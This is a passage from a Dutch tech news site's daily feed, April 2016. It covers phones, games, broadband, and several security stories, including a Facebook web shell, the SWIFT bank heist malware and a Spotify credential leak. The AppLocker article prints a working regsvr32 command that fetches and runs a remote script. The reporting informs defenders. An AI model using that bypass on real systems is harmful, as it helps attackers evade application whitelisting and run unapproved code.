Tip de redactie

Microsoft geeft in VS en Canada gratis Lumia 950 weg bij aanschaf Lumia 950 XL

Door Julian Huijbregts, 25 april 2016 22:23364 reacties

Microsoft geeft in de Verenigde Staten en Canada klanten die een Lumia 950 XL bestellen tijdelijk een Lumia 950 cadeau. Vorige week bleek dat de verkoopcijfers van Lumia-smartphones zijn gekelderd en dat Microsoft een relatief hoge voorraad heeft.

De Lumia 950-toestellen worden momenteel weggegeven via de websites van de Amerikaanse en Canadese Microsoft Stores. Klanten die een Lumia 950 XL aanschaffen, voor 649 Amerikaanse of 849 Canadese dollar, krijgen de kleinere Lumia 950 bij hun bestelling cadeau. Beide smartphones zijn net een half jaar op de markt.

Bij de bekendmaking van de jongste kwartaalcijfers bleek vorige week vrijdag dat de verkoop van Lumia-smartphones het afgelopen kwartaal is gekelderd. De leveringen van Lumia's kwamen uit op 2,3 miljoen exemplaren, waar dat in dezelfde periode een jaar eerder ging om 8,6 miljoen toestellen.

Microsofts financieel directeur Amy Wood maakte bekend dat de voorraad van smartphones die wel geproduceerd, maar nog niet geleverd zijn, relatief hoog is. Wood zei ook een nog scherpere daling van de omzet uit smartphones in de komende maanden te verwachten. Met het weggeven van de Lumia 950-toestellen lijkt Microsoft van de voorraden af te willen raken.

Microsoft geeft zelf geen uitleg bij de kortingsactie, maar wel is duidelijk dat het om een tijdelijke aanbieding gaat die geldt van 25 april tot 1 mei. Of een soortgelijke actie naar Europa komt is niet bekend. Op het moment van schrijven tonen de Europese Microsoft Stores geen vergelijkbare aanbieding.

Reacties (364)


Ontwikkelaar maakt draadloze ontvanger voor moderne controllers voor NES

Door Krijn Soeteman, 25 april 2016 20:2790 reacties

8bitdo heeft samen met Analogue een ontvanger ontwikkeld om moderne controllers en gamepads, zowel draadloos als met draad, aan te sluiten op een Nintendo Entertainment System, ofwel NES. Het kleinood heet Retro Receiver.

8bitdo nintendo nes analogueDe ontvanger past in de normale controllerpoort van een NES of een andere console met een vergelijkbare poort, zoals de door Analogue ontwikkelde Analogue Nt, een apparaat compatibel met de NES en de Japanse Famicom en het Famicom Disk System.

De Retro Receiver werkt met alle 8Bitdo-controllers en de controllers van de PS3, PS4, Wii Mote en Wii U Pro. De ontvanger maakt verbinding via bluetooth. Het geheel krijgt voldoende energie uit de controllerpoort van de NES om de verbindingen in stand te houden. De Retro Receiver kost 19,99 dollar.

wii u controller

Reacties (90)


Lionsgate brengt films uit op het Steam-platform

Door Krijn Soeteman, 25 april 2016 19:4783 reacties, submitter: anandus

Valve heeft een overeenkomst met de Canadese film- en videodistributeur Lionsgate gesloten. Met de deal kunnen ook verschillende blockbusters via het Steam-platform gekeken worden. De films zijn op alle ondersteunde platforms beschikbaar, inclusief SteamVR.

Afhankelijk van de locatie, zijn er meer dan honderd films van Lionsgate te kijken. Het aanbod in Europa valt daarbij in het niet met slechts 10 films. Hier missen onder andere de grote blockbusters, zoals Hunger Games, Kill Bill, Pulp Fiction en The Hurt Locker. In Europa moeten gebruikers het nog doen met onder andere vier delen van Leprechaun of Natural Born Pranksters.

Het is niet de eerste keer dat Steam films aanbiedt, maar wel voor het eerst dat Valve in zee gaat met een grote distributeur. De films zijn alleen streaming te kijken en niet te koop. Dit betekent dat de film voor 48 uur gehuurd wordt. Als na aankoop niet direct gestart wordt met afspelen, is de film nog tot maximaal dertig dagen na de huurdatum te zien.

De films zijn naast SteamVR beschikbaar op Windows, Mac, Linux en SteamOS. De goedkoopste films kosten 3,99 euro.

steam movie film lionsgate

Reacties (83)


Gegevens honderden Spotify-gebruikers verschijnen online

Door Krijn Soeteman, 25 april 2016 18:5279 reacties

Er is een lijst op Pastebin verschenen met accountgegevens van Premium-Spotify-accounts, inclusief de wachtwoorden. Of de gegevens verkregen zijn via Spotify, is niet duidelijk. Spotify zegt niet gehackt te zijn.

SpotifyHet is onduidelijk of de gegevens via Spotify verkregen zijn of dat Spotify met bekende gegevens gescraped is aangezien alle gegevens, behalve de wachtwoorden, via het Spotify-accountoverzicht direct vindbaar zijn. In totaal staan zeven Nederlandse accounts in de lijst. Belgische accounts staan er niet in.

Ook is het mogelijk dat de lijst deel uitmaakt van een lek uit het verleden bij Spotify of wellicht een andere bron. Techcrunch probeerde verschillende logins en had slechts met één account succes, waardoor de site denkt dat het ook om een oudere lijst kan gaan. Aan de andere kant is een Spotify-abonnement maandelijks en staat de automatische verlening bij de meeste gebruikers op een zeer recente datum uit het verleden of in de nabije toekomst.

Techcrunch heeft wel op kunnen maken uit enkele reacties van mensen uit de lijst dat ze recentelijk vreemde activiteit op hun Spotify-account zagen, zoals afgespeelde nummers die ze normaal nooit zouden afspelen.

spotify pastebin accounts

In geen van de gevallen had Spotify op voorhand contact gezocht met de gebruikers uit de lijst, althans niet de personen waar Techcrunch mee in contact trad. Dit in tegenstelling tot wat een woordvoerder van de streamingdienst aan de site meedeelde, namelijk dat Spotify Pastebin monitort op activiteit gerelateerd aan de dienst en dat ze direct contact opnemen met gebruikers als die gevonden worden in pastes.

Sommige gebruikers meldden ook dat er op andere online diensten was ingelogd met dezelfde accountgegevens, zoals op Facebook, Uber en Skype. Hergebruik van dezelfde wachtwoorden op verschillende sites is nooit handig.

Tweakers nam anderhalf jaar geleden het initiatief voor Verander Je Wachtwoorden-dag om mensen te bewegen sterke wachtwoorden te gebruiken en overal unieke wachtwoorden te gebruiken.

Reacties (79)


Ziggo komt met internetabonnement met snelheden van 300/30Mbit/s

Door Julian Huijbregts, 25 april 2016 18:28372 reacties

Ziggo komt op 2 mei met een 300/30-abonnement. Klanten die nu een 200/20-abonnement hebben, krijgen de hogere snelheid voor een meerprijs van vier euro per maand. Ziggo bevestigt dat er een snelheidsverhoging op komst is, maar wil nog geen exacte details geven.

De helpdesk van Ziggo zou aan klanten vertellen dat ze hun 200/20-abonnement kunnen upgraden naar een snelheid van 300/30Mbit/s, dat laat een van de betreffende klanten aan Tweakers weten. Daarbij zou ook gemeld worden dat er een meerprijs moet worden betaald van 'waarschijnlijk vier euro'.

Volgens breedbandwinkel.nl gaat Ziggo de hogere snelheid vanaf 2 mei invoeren en gaat het om een vervanging van het huidige Connect Max-pakket. De website bevestigt de prijsverhoging van vier euro en weet te melden dat andere pakketten geen hogere snelheid krijgen. Begin april voerde Ziggo een eerder aangekondigde snelheidsverhoging van het 120/12-abonnement door. Alle abo's die voorheen die snelheden hadden, zijn nu geüpgraded naar 150/15Mbit/s.

De stap van het 200/20-abonnement naar een variant met downloadsnelheid van 300Mbit/s en uploadsnelheid van 30Mbit/s lijkt op de wijziging die Ziggo doorvoerde bij de zakelijke abonnementen voor zzp'ers. Het 200/40-abonnement verdween en daar kwam een iets duurder 300/40-abonnement voor in de plaats. Deze abonnementen kunnen overigens ook door particulieren worden afgesloten.

Erik van Doeselaar, woordvoerder bij Ziggo, laat desgevraagd aan Tweakers weten dat snelheden van consumentenabonnementen 'in de hogere segmenten' binnenkort verhoogd worden. Exacte details wil Ziggo nog niet geven, maar volgens Doeselaar zal het niet lang meer duren voordat er meer informatie bekendgemaakt wordt en zullen klanten eerst worden geïnformeerd.

Ziggo gaat het 200/20-abonnement voor consumenten uitfaseren. Na 2 mei is het niet meer mogelijk om zo'n abonnement af te sluiten. Bestaande klanten kunnen dan nog wel gebruik blijven maken van het abonnement, of kiezen voor de snellere variant tegen de meerprijs.

Update 19.22 uur: Tweakers heeft informatie ingezien die de komst van het snellere abonnement bevestigt. Het artikel is daarop iets herschreven en de aanhalingstekens zijn uit de titel verwijderd.

Reacties (372)


John Romero start crowdfundingcampagne om nieuwe fps Blackroom te maken

Door Julian Huijbregts, 25 april 2016 18:1265 reacties

Night Work Games, de studio die is opgericht door John Romero en Adrian Carmack, zamelt op Kickstarter geld in om een nieuwe first person shooter te maken. Er moet minimaal 700.000 dollar opgehaald worden en de game zou in het vierde kartaal van 2018 af moeten zijn.

Blackroom grijpt volgens de makers, die zelf aan de wieg stonden van games als Doom en Quake, terug naar klassiekers uit het fps-genre. Het spel moet een hardcore fps worden met snelle gameplay, rocket jumps en veel geweld. De game wordt ontwikkeld voor de pc en mac, er moet een drm-vrije versie komen, naast dat het spel op Steam zal verschijnen.

Het spel krijgt een singleplayercampagne die in zo'n tien uur te doorlopen zal zijn, maar draait vooral om multiplayer. Er komt een co-op-modus, 1-op-1 deathmatch en een Arena-modus. Blackroom zal zes multiplayerlevels bevatten, die door John Romero zelf ontworpen worden. Verder willen de makers dat de community gaat zorgen voor meer maps.

Het spel wordt gemaakt in Unreal Engine 4, zegt Romero in een interview tegenover Developer. Er zijn nog geen gamebeelden te zien, enkel een aantal concept art-afbeeldingen. Blackroom is volgens Romero volledig aanpasbaar en hij moedigt het maken van mods en maps aan. Verder is bekend dat de game dedicated servers krijgt en dat de soundtrack wordt verzorgd door metalgitarist George Lynch.

Helaas!
De video die je probeert te bekijken is niet langer beschikbaar op Tweakers.net.

De Kickstartercampagne loopt tot 28 mei. Wie het project wil steunen krijgt door minimaal 29 dollar toe te zeggen recht op een digitaal exemplaar van de game. Vanaf 59 dollar krijgen backers een fysieke versie van het spel, op een speciaal gemaakte usb-stick.

Het verhaal van de game speelt zich af in de nabije toekomst en draait om het technologiebedrijf Hoxar, dat een techniek heeft ontwikkeld waarmee holografische werelden te creëren zijn die niet van echt te onderscheiden zijn. Deze werelden worden gecreëerd in een zwarte kamer: Blackroom. Met dit achtergrondverhaal kan het spel zich in allerlei werelden afspelen, van 'helse inferno's' tot de 'interstellaire ruimte', aldus Romero.

John Romero en Adrian Carmack behoorden in 1991 tot de vier oprichters van id Software. Daar werkten ze aan klassiekers zoals Wolfenstein 3D, Doom, Doom II en Quake. Romero was hoofdverantwoordelijke voor de ontwikkeling van Doom en later Quake. Na de release van de eerste Quake-game verliet Romero id Software, vanwege een ruzie met medeoprichter John Carmack.

Vervolgens begon Romero zijn eigen studio Ion Storm, voor de ontwikkeling van de game Daikatana. Dat spel had in 1997 uit moeten komen, maar dat werd uiteindelijk drie jaar later. Het spel was gebaseerd op de Quake II-engine, maar inmiddels waren Quake III en Unreal Tournament ook uitgekomen. Zodoende liep Daikatana bij de release grafisch achter en werd het geen commercieel succes.

Adrian Carmack, overigens geen familie van John Carmack, werkte tot 2005 als video game artist bij id Software. Daarna was hij niet meer werkzaam in de game-industrie. Samen met Romero staat hij nu aan het hoofd van de nieuwe studio Night Work Games en voor Blackroom zal hij als art director aan de gang gaan.

Blackroom concept art
Blackroom concept artBlackroom concept artBlackroom concept art

Blackroom concept art

Reacties (65)


Beveiligingsonderzoeker ontdekt backdoorscript bij hacken Facebook

Door Krijn Soeteman, 25 april 2016 17:5631 reacties, submitter: ikvanwinsum

Whitehathacker Orange Tsai ontdekte sporen van een backdoorscript op de bedrijfsservers van Facebook. Via het script op de servers van de socialmediagigant wisten hackers vermoedelijk wachtwoorden en gebruikersnamen van medewerkers in handen te krijgen.

FacebookOrange kwam op het spoor van de kwetsbaarheden door via een omgekeerde whois-zoekactie de domeinnamen van Facebook door te lichten. Hij kwam daar een domeinnaam tfbnw.net tegen, wat voor 'The Facebook Network' staat. Vervolgens ontdekte hij vpn.tfbnw.net, schrijft hij op zijn blog.

Daarna zocht hij verder binnen de ip-adressen van Facebook en kwam op het domein files.fb.com tussen verschillende klasse-c-ip-adressen uit. Het files-domein werd door Facebook-werknemers gebruikt voor het delen van bestanden via Accellions Secure File Transfer-applicatie FTA. Orange ontdekte in totaal zeven bugs in FTA en kon via de kwetsbaarheden verder de servers van Facebooks medewerkers binnendringen.

Door bestaande log-data door te nemen op de servers, ontdekte Orange dat er een op php-gebaseerde backdoor bestond, ook wel bekend als PHP Web Shell. Deze shell zou opgezet kunnen zijn door een hacker. Via de hack zouden gegevens van zo'n 300 medewerkers in handen gekregen zijn.

Nadat Orange voldoende informatie had verzameld, lichtte hij het Facebook Security Team in. Voor het vinden en melden van de bug kreeg Orange 10.000 dollar. Orange zelf werkt voor een Taiwanese beveiligingsfirma Devcore.

Facebook reageerde later op Hacker News met de mededeling dat het bedrijf niet de volledige controle over alle software heeft. Ook zouden de systemen volgens de Facebookmedewerker los staan van andere systemen, ofwel de systemen die gebruikt worden voor de site zelf. In de reactie maakt de medewerker van Facebook duidelijk dat wat Orange ontdekte, voortkwam uit onderzoek van een andere beveiligingsonderzoeker die meedoet aan het bounty program van Facebook.

Reacties (31)


Onderzoeker vindt manier om AppLocker-restricties in Windows te omzeilen

Door Sander van Voorst, 25 april 2016 15:1975 reacties, submitter: R0GGER

De Amerikaanse beveiligingsonderzoeker Casey Smith heeft in een blogpost gepubliceerd dat de Windows-software AppLocker eenvoudig omzeild kan worden. Daardoor is het bijvoorbeeld mogelijk om programma's uit te voeren die niet door AppLocker zijn toegestaan.

AppLocker maakt het mogelijk om het gebruik van programma's per gebruiker in te stellen en daarmee onder andere het uitvoeren van bepaalde toepassingen te beperken. De software is aanwezig in Windows 7 en hoger. Smith kwam erachter dat de beveiliging te omzeilen is door het programma regsvr32. Dit zorgt er normaal gesproken voor dat bijvoorbeeld dll-bestanden worden geregistreerd in het Windows-register. Smith ontdekte de methode toen hij een toepassing wilde uitvoeren op een werkstation dat bepaalde handelingen beperkte met AppLocker.

Het omzeilen van de beveiliging werkt doordat regsvr32 scripts accepteert in de vorm van een url. Dit feit is volgens Smith maar bij weinigen bekend en heeft een aantal voordelen: "Het geweldige is dat regsvr32 gebruikmaakt van een aanwezige proxy, tls gebruikt en redirects volgt. Het is ook een ondertekende standaard Windows-binary." Voor het uitvoeren van een script is alleen nodig dat dit op een locatie aanwezig is die de gebruiker beheert, vult Smith aan. Hij heeft ter illustratie een proof of concept aangemaakt.

De onderzoeker geeft aan dat de nodige code zeer kort is en zo nodig in een tweet zou passen. Het commando neemt deze vorm aan: regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll, waarbij het sct-bestand het uit te voeren script bevat. Het is ook mogelijk andere extensies te gebruiken, bijvoorbeeld een xml-bestand met javascript, zoals The Register aantoont. Een bijkomstigheid is dat er bij deze techniek geen COM-object in het register wordt opgenomen en dat deze mede daardoor lastig vast te stellen is. Bovendien is er geen beheerderstoegang nodig om het commando uit te voeren. Er is op dit moment nog geen patch van Microsoft beschikbaar.

Reacties (75)


Nederlands .nl-domein viert dertigste verjaardag

Door Olaf van Miltenburg, 25 april 2016 14:3854 reacties

Het is maandag dertig jaar geleden dat de Nederlander Piet Beertema de eerste .nl-domeinnaam registreerde. Dit was het eerste actieve landendomein buiten de VS. Het aantal geregistreerde .nl-domeinnamen groeit inmiddels nauwelijks meer.

Beertema was destijds systeembeheerder bij het Centrum voor Wiskunde en Informatica en speelde daarnaast een belangrijke rol bij EUnet. Dat netwerk van Unix-systemen maakte eind jaren tachtig een flinke groei door, tot meer dan 22.000 computers. "Ze moesten allemaal een unieke naam hebben van zeven tekens. Ga er maar aanstaan om dat te coördineren", zei Beertema hierover tegen Tweakers, bij de aflevering van Polderpioniers waarin hij centraal stond.

Polderpioniers: de man die Nederland aansloot op het internet

Begin jaren tachtig was het Domain Name System ontwikkeld, waarvan Darpa de adoptie stimuleerde. Dit was de oplossing voor EUnet om de groei behapbaar te maken. Via contacten bij Darpa diende Beertema daarom in 1986 de aanvraag voor de eerste registratie van het .nl-domein in, cwi.nl, bij de Amerikaanse computerwetenschapper en internetpionier Jon Postel. "Het zal wel niks worden, maar we zien wel wat er gebeurt", verwoordt Beertema het idee destijds.

Na goedkeuring had Nederland het eerste landendomein buiten de VS. Volgens Beertema was Nederland een dag eerder dan de vier Scandinavische landen omdat hun netwerk haperde. In de tien jaar erna bleef Beertema het beheer over .nl voeren, maar door de enorme groei van internet werd besloten dit op 31 januari 1996 over te dragen aan de SIDN. Beertema's website heet nog altijd godfatherof.nl.

Van 2000 tot 2012 maakte .nl een flinke groei door. In 2003 werd de miljoenste .nl-domeinnaam geregistreerd, in 2012 was dat gegroeid naar 5 miljoen. Inmiddels is aan die onstuimige groei een einde gekomen. In 2015 werden er netto nog maar 73.000 domeinnamen aan de .nl-zone toegevoegd.

NL domein 2015

Reacties (54)


Raspberry Pi-stichting brengt nieuwe cameramodule met 8-megapixelsensor uit

Door Julian Huijbregts, 25 april 2016 12:2539 reacties, submitter: BOotaBle

De Raspberry Pi-stichting heeft een nieuwe cameramodule voor zijn computerbordjes uitgebracht. De module maakt gebruik van een Sony IMX219-sensor en is ook verkrijgbaar in een variant die gevoelig is voor nabij-infrarood licht.

De nieuwe module volgt de vijfmegapixelvariant uit 2013 op. Voor die cameramodule maakte Raspberry Pi gebruik van een OmniVision OV5647-sensor, die sinds eind 2014 uit productie is. De stichting heeft Sony bereid gevonden om chips te leveren voor de nieuwe module. De gebruikte IMX219 is een bsi-cmos van het 1/4"-formaat. Volgens de makers heeft de nieuwe module niet alleen een hogere resolutie, maar is het een flinke stap vooruit op gebied van beeldkwaliteit, kleurweergave en prestaties bij weinig licht.

Net als de oude cameramodule zal de nieuwe versie beschikbaar zijn in twee varianten. Een variant voor reguliere kleurenbeelden en een model voor nabij-infraroodopnames. De maximale fotoresolutie is 3280x2464 pixels, filmen is mogelijk in resoluties van 1920x1080, 1280x720 of 640x480 pixels bij respectievelijk 30, 60 en 90fps. Het camerabordje meet 25x23x9mm en krijgt dezelfde adviesprijs als zijn voorganger: 25 dollar.

Raspberry Pi camera V2

Reacties (39)


Blendle begint met het leveren van apps voor kranten en tijdschriften

Door Sander van Voorst, 25 april 2016 12:1837 reacties

Webdienst Blendle kondigt aan vanaf nu ook apps voor kranten en tijdschriften te ontwikkelen. Volgens het bedrijf zijn er geïnteresseerde partijen in Nederland, Duitsland en België. Met een dergelijk app zouden zij af willen van hun eigen, vaak verouderde apps om inhoud te bekijken.

Volgens Blendle-oprichter Alexander Klöpping hebben tijdschriften en kranten nu vaak een app waarmee de gehele inhoud in een pdf-bestand gedownload moet worden. Dat zorgt er volgens hem voor dat het vaak enkele minuten kan duren voordat een gebruiker aan lezen toekomt. De eerste app die Blendle voor een bedrijf heeft ontwikkeld, is van Vrij Nederland. Er is op dit moment alleen een iOS-versie, Blendle geeft aan dat een Android-versie van zijn app in de zomer beschikbaar komt.

De app zorgt ervoor dat inhoud automatisch wordt aangepast aan de schermgrootte van de gebruiker, waardoor het niet nodig is om in te zoomen. Dit moet vooral het gebruik op apparaten met kleine schermen verbeteren. Klöpping legt uit dat zijn bedrijf geprobeerd heeft zo snel mogelijk een app te ontwikkelen die beter is dan wat uitgevers op dit moment hebben. Daarna zou er gekeken worden welke verbeteringen aan de software kunnen worden toegevoegd.

Vrij Nederland-uitgever Wouter van der Meulen vult aan dat er steeds meer gebruikers zijn die zijn blad digitaal wilden lezen en dat zij het eerste tijdschrift waren dat de betaalknop van Blendle op de eigen site implementeerde. "Onze totale Blendle-omzet loopt nu al in de tonnen per jaar. En we zijn pas net begonnen", voegt Van der Meulen daaraan toe.

Het Nederlandse Blendle breidde in de zomer van 2015 uit naar Duitsland en startte in maart van dit jaar een bétatest in de Verenigde Staten, waarbij tienduizend gebruikers die dienst kunnen uitproberen.

blendle app

Reacties (37)


Rock Band 4 krijgt in het najaar update voor online multiplayer

Door Julian Huijbregts, 25 april 2016 11:059 reacties

Rock Band 4 krijgt middels een update de mogelijkheid tot synchrone online multiplayer. De functie moet het mogelijk maken voor spelers om het via internet gelijktijdig tegen elkaar op te nemen. Momenteel is dat alleen asynchroon mogelijk.

De update komt gratis beschikbaar voor alle Rock Band 4-bezitters. Een precieze datum is nog niet bekendgemaakt, maar in het najaar zou online multiplayer beschikbaar moeten zijn. In diezelfde periode verschijnt er ook een betaalde uitbreiding voor de game.

Volgens Harmonix zal online multiplayer werken zoals de Quickplay-modus, maar zijn er aanpassingen gemaakt die het samenspelen via internet tot een 'gestroomlijnde ervaring' moeten maken. De ontwikkelaar zal tijdens de E3 in juni meer bekendmaken.

Rock Band 4 kwam vorig jaar uit de Xbox One en PlayStation 4. Een crowdfundingcampagne om geld in te zamelen voor een pc-versie van Rock Band 4 wist zijn doel niet te behalen. Harmonix werkt momenteel ook aan Rock Band VR voor de Oculus Rift.

Rock Band 4: Band-in-a-Box, PlayStation 4

Reacties (9)


'Geldroof centrale bank Bangladesh via hack in Swift-software gepleegd'

Door Sander van Voorst, 25 april 2016 10:53109 reacties, submitter: R0GGER

Een bankroof in Bangladesh, waarbij 81 miljoen dollar is buitgemaakt, is waarschijnlijk gepleegd door de Swift-clientsoftware met malware te infecteren. Op die manier waren criminelen in staat om grote bedragen over te schrijven naar Filipijnse rekeningen.

Swift-logoEen woordvoerder van Swift liet aan persbureau Reuters weten dat de criminelen de Swift-clientsoftware genaamd 'Alliance Access' als doelwit hadden. De Swift-groep wil maandag naast een software-update ook een waarschuwing voor banken publiceren, om deze aan te zetten tot het beter bewaken van hun betalingssystemen. Het Britse beveiligingsbedrijf BAE Systems was eerder tot de conclusie gekomen dat de criminelen gebruikmaakten van Swift.

Tot nu toe werd vermoed dat de aanvallers toegang hadden verkregen tot het systeem van de centrale bank van Bangladesh en zo Swift-inloggegevens wisten te bemachtigen. Het onderzoek van BAE Systems zou echter aantonen dat de Swift-software zelf was gebruikt. BAE-onderzoekshoofd Adrian Nish stelt dat het om een geavanceerde aanval ging: "Ik kan mij geen andere zaak voor de geest halen, waarbij aanvallers zich in deze mate aan de omgeving hebben aangepast waarin zij te werk gingen." Het is tot nu toe niet duidelijk welke partij verantwoordelijk is voor de bankroof.

De gebruikte malware was aanwezig in het bestand 'evtdiag.exe' en was in staat om de sporen van de criminelen uit te wissen door informatie over overschrijvingsverzoeken in de Swift-database van de bank aan te passen. Op die manier konden logboeken van uitgaande verzoeken van de criminelen verwijderd worden en konden zij binnenkomende verzoeken onderscheppen. Het was daarnaast mogelijk om het saldo van bepaalde rekeningen aan te passen en ervoor te zorgen dat een printer gewijzigde afdrukken produceerde, zodat deze niet zouden opvallen.

Het systeem werd in de gaten gehouden vanaf een Egyptische server. Het is nog steeds onduidelijk op welke manier de aanvallers een overschrijving konden aanmaken. Het malwarebestand zou bovendien deel uitmaken van een uitgebreidere toolkit, zo stelt BAE Systems. In de loop van onderzoek zou zijn gebleken dat de bank onder andere gebruikmaakte van goedkope switches van rond de tien dollar, die zonder firewall aan het Swift-netwerk waren verbonden.

Bovendien hadden de aanvallers geprobeerd om in totaal 951 miljoen dollar over te schrijven, maar deze overschrijving werd door een medewerker van de Deutsche Bank ontdekt door een spelfout. In de naam van de ontvanger was het woord 'foundation' namelijk als 'fandation' gespeld.

Swift is een internationale organisatie waarin financiële instellingen informatie uitwisselen over transacties. Het platform is wereldwijd in gebruik bij 11.000 banken en andere instellingen. Een klein deel daarvan zet daarvoor de Alliance Access-software in.

Reacties (109)

Lees meer


Xiaomi toont op 10 mei mogelijk zijn eerste grote 6,4"-smartphone

Door Arnoud Wokke, 25 april 2016 09:5459 reacties

Xiaomi gaat zijn eerste smartphone met groot scherm, vermoedelijk 6,4", op 10 mei presenteren. Dat kondigt de Chinese fabrikant in een teaser aan, die te zien is op het Chinese sociale netwerk Weibo. Tot nu toe had de grootste smartphone van de fabrikant een scherm van 5,7".

De Weibo-post laat zien dat Xiaomi op 10 mei een evenement houdt ter introductie van de Mi Max. Een listing in de database van benchmark GFXBench toont een full-hd-scherm met een diagonaal van 6,4". Als die listing klopt, draait het toestel op een Qualcomm Snapdragon 650-soc, een hexacore met twee Cortex A72-kernen en vier A53-kernen. Het geheugen zou 2GB bedragen, terwijl de opslag lijkt uit te komen op 16GB.

De camera vermeldt een maximale resolutie van zestien megapixels, een resolutie die de Mi 5 ook ondersteunt. Verdere details over het toestel zijn nog niet bekend. Een afbeelding die Xiaomi voor het weekeinde online zette toonde het toestel in de broekzak van een spijkerbroek. Daarop was het voor Xiaomi kenmerkende Mi-logo links bovenin niet zichtbaar. Bij de Mi 5 zit dat logo wel, net als alle voorgaande Xiaomi-toestellen. Als het scherm een diagonaal heeft van 6,4", is het toestel in totaal 8,4cm breed en tegen 17cm lang. Ter vergelijking: de Nexus 6 van Motorola is 16x8,3cm.

Telefoons met een scherm boven 6" zijn vrij zeldzaam. Huawei bracht vorig jaar de P8max uit, terwijl Sony enkele jaren geleden de Xperia Z Ultra op de markt bracht met 6,4"-scherm.

Xiaomi Max-teaserXiaomi Max-teaser

Reacties (59)


Niet eerder vertoonde korte Tomb Raider-film uit 1998 verschijnt online

Door Julian Huijbregts, 25 april 2016 09:1745 reacties

Er is een korte film van Tomb Raider gepubliceerd, die in 1998 werd gemaakt voor de besloten launchparty van Tomb Raider 3. De film van 8,5 minuten is nu, achttien jaar na dato, eindelijk door iedereen te bekijken.

De korte film met de titel The Trilogy werd gemaakt in opdracht van Eidos Interactive, door Silver Films. In de film ondervragen detectives een gamer over zijn 'vriendin', Lara Croft. In 1998 werd de film vertoond in het Natural History Museum in Londen, tijdens het evenement dat ter ere van de introductie van de game werd georganiseerd.

The Trilogy is vervolgens nooit meer vertoond, maar producer Janey de Nordwall vond onlangs de originele Betacam-tape, waar de film op staat. Square Enix, intussen de uitgever van Tomb Raider-games, heeft besloten om de video te publiceren ter ere van het twintigjarige bestaan van de gamereeks. Het eerste deel verscheen in oktober 1996.

Het succes van de Tomb Raider-games in de jaren negentig resulteerde ook in twee volledige bioscoopfilms. Lara Croft: Tomb Raider, met Angelina Jolie in de hoofdrol, verscheen in 2001. Twee jaar later volgde Lara Croft: The Cradle of Life.

Helaas!
De video die je probeert te bekijken is niet langer beschikbaar op Tweakers.net.

Reacties (45)


Chinese instantie Tenaa laat plaatjes onaangekondigde Honor V8 uitlekken

Door Arnoud Wokke, 25 april 2016 08:4242 reacties

De Chinese keuringsinstantie Tenaa heeft afbeeldingen en specs online gezet van de nog niet aangekondigde Honor V8-smartphone van Huawei. Het toestel heeft een metalen behuizing en beschikt over een 5,7"-scherm. Er komen twee verschillende varianten.

De KN-TL10 en AL10 lijken alleen te verschillen in kleur, terwijl de AL20 op diverse andere punten afwijkt. Alle varianten hebben een metalen behuizing van 7,75mm dik en schermranden aan de zijkant van 3,31mm, iets meer dan Huaweis eigen Mate 8. De TL10 en AL10 hebben een lcd met full-hd-resolutie, de AL20 komt uit op 2560x1440 pixels.

De soc is waarschijnlijk een Kirin 950 voor de TL10 en AL10 en een Kirin 955 voor de AL20. De specs spreken van een octacore-processor op respectievelijk 2,3GHz en 2,5GHz, kloksnelheden die overeen komen met de Kirin 950 uit de Mate 8 en Kirin 955 uit de Huawei P9.

Net als die P9 heeft de Honor V8 aan de achterkant een dubbele camera, met twee sensors die ieder een maximale resolutie van twaalf megapixels hebben. Op de afbeeldingen is de naam Leica niet te zien, die wel prijkt op de behuizing van de P9. De Honor 6 Plus van vorig jaar heeft ook twee gelijke camera's aan de achterkant. De AL20 heeft een scherm met QHD-resolutie van 2560x1440 pixels. Het zou voor het eerst zijn dat Huawei een dergelijk scherm gebruikt voor een 'eigen' toestel. Tot nu toe zette het alleen een QHD-scherm in de Nexus 6P voor Google.

Alle varianten hebben een geheugen ter grootte van 4GB. Honor stuurde eerder al een teaser voor de aankondiging van de V8 op 10 mei.

Honor V8 Afmetingen Schermresolutie Geheugen Opslag Kloksnelheid
AL10/TL10 157,0x77,6x7,75mm 1920x1080 4GB 32GB 2,3GHz
AL20 157,0x77,6x7,75mm 2560x1440 4GB 64GB 2,5GHz

Honor V8 - Tenaa

Reacties (42)


Qualcomm: Quick Charge en usb-c gaan prima samen

Door Olaf van Miltenburg, 25 april 2016 08:3668 reacties

Volgens Qualcomm is Quick Charge connector-onafhankelijk en zijn er geen meldingen bekend van problemen die de laadstandaard op zou leveren in combinatie met usb-c. De fabrikant reageert daarmee op de claims dat die combinatie in strijd is met de usb-c-specificatie.

Volgens Qualcomm kan Quick Charge geïmplementeerd worden in apparaten met verschillende connectors, waaronder usb type-a, micro-usb en usb type-c. "Als een oem ervoor kiest om Quick Charge in hun apparaat te implementeren, kunnen ze de spanning zo aanpassen dat deze binnen de specificatie van de usb type-c-standaard valt", laat Qualcomm aan Android Central weten.

Qualcomm reageert daarmee op uitlatingen van Benson Leung. Deze Google-technicus is al langer bezig om usb-c-implementaties die niet aan de specificatie voldoen onder de aandacht te brengen. Hij waarschuwde vorig jaar bijvoorbeeld voor goedkope usb-c-kabels, die schade op zouden kunnen leveren.

Volgens Leung verbiedt de usb-c-specificatie de combinatie met Quick Charge 3.0. Specifiek zou sectie 4.8.2 van de specificatie verbieden dat bedrijven hun eigen laadmethode implementeren als deze gebruikmaakt van het aanpassen van vbus. Dit is precies wat Qualcomm doet met Quick Charge 3.0 om tot de spanning van 9V en 12V te komen. Leung wees er op dat de HTC 10 en de LG G5 usb-c combineren met Quick Charge 3.0-ondersteuning.

De sectie zou opgenomen zijn in de specificatie om onduidelijkheid te voorkomen aangezien USB Power Delivery al tot aan 20V en maximaal 5A ondersteunt. Dit zou ook de reden zijn waarom de Nexus 6P en 5X geen Quick Charge ondersteunen.

Usb-c charging

Reacties (68)


'Google brengt Play Store met miljoen Android-apps naar Chrome OS'

Door Olaf van Miltenburg, 25 april 2016 07:4478 reacties

Google heeft Chrome OS van een enigszins verstopte optie voorzien om Android-apps op Chromebooks te draaien. De functionaliteit werkt nog niet maar gebruikers vonden een dialoogvenster met de melding dat de Play Store naar Chrome OS komt.

Dat dialoogvenster spreekt van de 'keuze tussen meer dan een miljoen apps en games van de Play Store die geïnstalleerd en gebruikt kunnen worden op je Chromebook'. De notificatie werd gevonden nadat Reddit-gebruikers een optie bij instellingen van de ontwikkelaarsversie van Chrome OS vonden met de tekst "Enable Android apps to run on your Chromebook".

